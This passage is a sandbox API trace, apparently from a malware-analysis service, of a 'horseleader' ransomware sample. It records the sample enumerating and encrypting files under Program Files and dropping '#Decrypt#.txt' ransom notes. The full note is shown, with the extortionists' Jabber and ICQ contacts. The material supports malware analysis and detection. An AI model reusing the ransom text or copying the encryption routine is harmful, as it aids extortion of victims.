hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc535bb94, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc535bb94, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4573c389, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x6860, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="To_Do_List.emf", cAlternateFileName="")) returned 1 [0245.800] lstrcmpiW (lpString1="To_Do_List.emf", lpString2="Windows") returned -1 [0245.800] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf") returned 76 [0245.800] StrStrIW (lpFirst="To_Do_List.emf", lpSrch=".horseleader") returned 0x0 [0245.801] lstrcmpW (lpString1="To_Do_List.emf", lpString2="#Decrypt#.txt") returned 1 [0245.801] lstrcmpW (lpString1="To_Do_List.emf", lpString2="_uninstalling_.png") returned 1 [0245.801] lstrlenW (lpString=".testttjffg") returned 11 [0245.801] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf", lpSrch=".testttjffg") returned 0x0 [0245.801] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.801] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.801] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.801] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fea93, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54fea93, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457ae7a3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc60, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="White_Chocolate.jpg", cAlternateFileName="")) returned 1 [0245.801] lstrcmpiW (lpString1="White_Chocolate.jpg", lpString2="Windows") returned -1 [0245.801] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg") returned 81 [0245.801] StrStrIW (lpFirst="White_Chocolate.jpg", lpSrch=".horseleader") returned 0x0 [0245.801] lstrcmpW (lpString1="White_Chocolate.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.801] lstrcmpW (lpString1="White_Chocolate.jpg", lpString2="_uninstalling_.png") returned 1 [0245.801] lstrlenW (lpString=".testttjffg") returned 11 [0245.801] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg", lpSrch=".testttjffg") returned 0x0 [0245.802] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.802] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.803] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5524bf0, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5524bf0, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457faa5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3ad7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Wrinkled_Paper.gif", cAlternateFileName="")) returned 1 [0245.803] lstrcmpiW (lpString1="Wrinkled_Paper.gif", lpString2="Windows") returned 1 [0245.803] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif") returned 80 [0245.803] StrStrIW (lpFirst="Wrinkled_Paper.gif", lpSrch=".horseleader") returned 0x0 [0245.803] lstrcmpW (lpString1="Wrinkled_Paper.gif", lpString2="#Decrypt#.txt") returned 1 [0245.803] lstrcmpW (lpString1="Wrinkled_Paper.gif", lpString2="_uninstalling_.png") returned 1 [0245.803] lstrlenW (lpString=".testttjffg") returned 11 [0245.803] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif", lpSrch=".testttjffg") returned 0x0 [0245.803] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.803] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.803] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5524bf0, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5524bf0, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457faa5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3ad7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Wrinkled_Paper.gif", cAlternateFileName="")) returned 0 [0245.803] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.804] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\#Decrypt#.txt") returned 75 [0245.804] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.811] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.811] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.812] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.813] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.813] CloseHandle (hObject=0x21c) returned 1 [0245.813] GetProcessHeap () returned 0x780000 [0245.813] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.813] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="TextConv", cAlternateFileName="")) returned 1 [0245.813] lstrcmpiW (lpString1="TextConv", lpString2="Windows") returned -1 [0245.813] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned 59 [0245.813] lstrcmpW (lpString1="TextConv", lpString2=".") returned 1 [0245.813] lstrcmpW (lpString1="TextConv", lpString2="..") returned 1 [0245.813] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.813] GetProcessHeap () returned 0x780000 [0245.814] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.814] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*") returned 61 [0245.814] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.814] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.814] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\.") returned 61 [0245.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.814] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.814] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.814] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\..") returned 62 [0245.815] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.815] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.815] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0245.815] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0245.815] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned 65 [0245.815] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0245.815] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0245.815] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.815] GetProcessHeap () returned 0x780000 [0245.815] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.815] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*") returned 67 [0245.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xbc1c3940, dwReserved1=0xc27b3993, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0245.815] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.815] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\.") returned 67 [0245.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.816] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xbc1c3940, dwReserved1=0xc27b3993, cFileName="..", cAlternateFileName="")) returned 1 [0245.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.816] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\..") returned 68 [0245.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.816] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xbc1c3940, dwReserved1=0xc27b3993, cFileName="..", cAlternateFileName="")) returned 0 [0245.816] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0245.816] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\#Decrypt#.txt") returned 79 [0245.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.817] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.817] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0245.818] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.818] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0245.818] CloseHandle (hObject=0x158) returned 1 [0245.818] GetProcessHeap () returned 0x780000 [0245.818] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.818] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xcf518520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x23d78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSCONV97.DLL", cAlternateFileName="")) returned 1 [0245.818] lstrcmpiW (lpString1="MSCONV97.DLL", lpString2="Windows") returned -1 [0245.818] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL") returned 72 [0245.819] StrStrIW (lpFirst="MSCONV97.DLL", lpSrch=".horseleader") returned 0x0 [0245.819] lstrcmpW (lpString1="MSCONV97.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.819] lstrcmpW (lpString1="MSCONV97.DLL", lpString2="_uninstalling_.png") returned 1 [0245.819] lstrlenW (lpString=".testttjffg") returned 11 [0245.819] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL", lpSrch=".testttjffg") returned 0x0 [0245.819] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.819] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.819] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.820] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL") returned 72 [0245.820] StrStrW (lpFirst="MSCONV97.DLL", lpSrch=".txt") returned 0x0 [0245.820] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=146808) returned 1 [0245.820] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.820] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.822] SetFilePointerEx 